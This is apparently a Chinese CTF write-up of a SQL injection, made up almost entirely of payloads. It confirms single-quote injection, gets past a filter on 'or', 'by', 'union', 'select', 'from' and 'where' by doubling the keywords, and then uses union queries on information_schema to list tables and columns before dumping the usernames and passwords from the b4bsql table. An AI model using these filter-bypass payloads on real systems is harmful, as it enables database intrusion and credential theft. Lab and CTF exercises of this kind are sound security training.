输入:
1'
1
判断是单引号注入
输入:
1' order by 1#
1
发现过滤了or,by
尝试双写注入
输入:
1' oorrder bbyy 4#
1
是四列
输入:
1' ununionion seselectlect 1,database(),3#
1
输入:
1' ununionion seselectlect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()#(from where 也被过滤了,information中有or)
1
输入:
1' ununionion seselectlect 1,database(),group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'#
1
输入:
1' ununionion seselectlect 1,2,group_concat(username,passwoorrd) ffromrom b4bsql #
1